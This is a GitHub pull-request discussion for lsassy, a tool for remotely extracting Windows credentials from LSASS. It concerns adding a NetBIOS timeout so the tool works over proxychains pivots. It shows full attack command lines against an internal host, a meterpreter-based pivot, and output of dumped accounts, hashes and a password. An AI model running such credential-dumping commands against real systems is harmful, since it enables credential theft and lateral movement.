search

login-securite / lsassy

Extract credentials from lsass remotely
https://en.hackndo.com/remote-lsass-dump-passwords/
MIT License
2.04k stars 246 forks source link

Feature/nmb timeout #50

Closed Script-Nomad closed 3 years ago

Script-Nomad commented 3 years ago

This PR adds a new argument to the CLI for LSASSY to support specifying a nmb/smb connection timeout value for Impacket in order to better support slow connections such as with proxychains.

My specific situation was that I was able to establish a meterpreter shell on a remote network 

proxychains lsassy -d example.com -u someuser -p badpassword123 10.172.47.161    
[proxychains] config file found: /etc/proxychains.conf                                                                                
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4                                  
[proxychains] DLL init: proxychains-ng 4.14                                                                
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:445  ...  OK                
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:135  ...  OK                        
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:52580  ...  OK                         
ERROR:pypykatz:Failed to automatically detect correct LSA template!                                                   
Traceback (most recent call last):                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/pypykatz.py", line 188, in get_lsa                         
    lsa_dec = LsaDecryptor.choose(self.reader, lsa_dec_template, self.sysinfo)                                 
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor.py", line 20, in choose                        
    return LsaDecryptor_NT6(reader, decryptor_template, sysinfo)                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 22, in __init__                  
    self.acquire_crypto_material()                                                                                                    
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 26, in acquire_crypto_material               
    sigpos = self.find_signature()                                                                      
  File "/usr/lib/python3/dist-packages/pypykatz/lsadecryptor/lsa_decryptor_nt6.py", line 44, in find_signature                        
    fl = self.reader.find_in_module('lsasrv.dll', self.decryptor_template.key_pattern.signature)               
  File "/usr/lib/python3/dist-packages/minidump/minidumpreader.py", line 220, in find_in_module                
    t = self.reader.search_module(module_name, pattern)                                                        
  File "/usr/lib/python3/dist-packages/minidump/minidumpreader.py", line 270, in search_module                            
    t+= ms.search(pattern, self.file_handle)                                                                              
  File "/usr/lib/python3/dist-packages/minidump/common_structs.py", line 124, in search                                   
    data = file_handler.read(self.size)                                                                                               
  File "/usr/local/lib/python3.8/dist-packages/lsassy/modules/impacketfile.py", line 77, in read                                      
    value = self._conn.readFile(self._tid, self._fid, self._currentOffset, size + self._buffer_min_size)                              
  File "/usr/local/lib/python3.8/dist-packages/lsassy/modules/impacketconnection.py", line 158, in readFile                           
    return self._conn.readFile(tid, fid, offset, size, singleCall=False)                     
  File "/usr/lib/python3/dist-packages/impacket/smbconnection.py", line 594, in readFile     
    bytesRead = self._SMBConnection.read_andx(treeId, fileId, offset, toRead)                
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1908, in read_andx            
    return self.read(tid, fid, offset, max_size, wait_answer)                                
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 1243, in read                                                          
    ans = self.recvSMB(packetID)                                          
  File "/usr/lib/python3/dist-packages/impacket/smb3.py", line 416, in recvSMB                                                        
    data = self._NetBIOSSession.recv_packet(self._timeout)                                                                            
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 914, in recv_packet                                                     
    data = self.__read(timeout)                                           
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 1004, in __read                                                         
    data2 = self.read_function(length, timeout)                                                         git pu                              
  File "/usr/lib/python3/dist-packages/impacket/nmb.py", line 986, in non_polling_read                                                
    raise NetBIOSTimeout                                                  
impacket.nmb.NetBIOSTimeout: The NETBIOS connection with the remote host timed out. 
[proxychains] Strict chain  ...  127.0.0.1:1081  ...  10.172.47.161:445  ...  OK    
[X] [10.172.47.161] Unknown error

I made a couple changes. First, there is adding the -nmb-timeout argument, which gets forwarded to the ImpacketConnection.Options() and is passed as the timeout value for all impacket connections going forward. By default, this timeout value is 5, which is fine for most stable connections, but not for proxychaining.

I also modified the fileRead() function so that it will raise an exception if the NetBIOSTimeout is encountered so that the user can be notified and change their arguments accordingly. Further, I've modified the default argument for -nmb-timeout to 10 seconds, which is plenty of time for most proxy chains. Here is an example with a second proxy in the chain just to demonstrate that it works.

proxychains lsassy --nmb-timeout 10 -m 1 -d example.com -u someuser -p badpassword123 10.172.47.161
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:445-<><>-OK
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:135-<><>-OK
|S-chain|-<>-10.100.0.10:1080-<>-127.0.0.1:1081-<><>-10.172.47.161:52580-<><>-OK
[+] [10.172.47.161] example\administrator  [NT]001122334455667788990102030405060708090a:[SHA1]001122334455667788990102030405060708090a
[+] [10.172.47.161] example\someuser  baddpassword

Note: Had some dirty files from merging the latest lsassy in the PR. Those can be squashed.

Hackndo commented 3 years ago

Hey there, thank you for your PR. Current work is being done on version 3.0.0 (see associated branch), and the tool has been re-written from scratch. I just added your timeout to SMB connection in here: https://github.com/Hackndo/lsassy/commit/354d2d5500e0579605e544b3e61be14e4208204d If you want, you can try it out and tell me if it works for you. Cheerz

Script-Nomad commented 3 years ago

Lol, sadly, the host I was testing this on is no longer live, so it looks like my temporary development environment just walked out of his office.

After looking at the code though, I think this achieves the same goals. I only separated the nmb-timeout from the lsassy timeout since I wasn't sure what else that timeout value would affect. In any case, I'm totally fine with this. Looking forward to the 3.0.0 release :+1: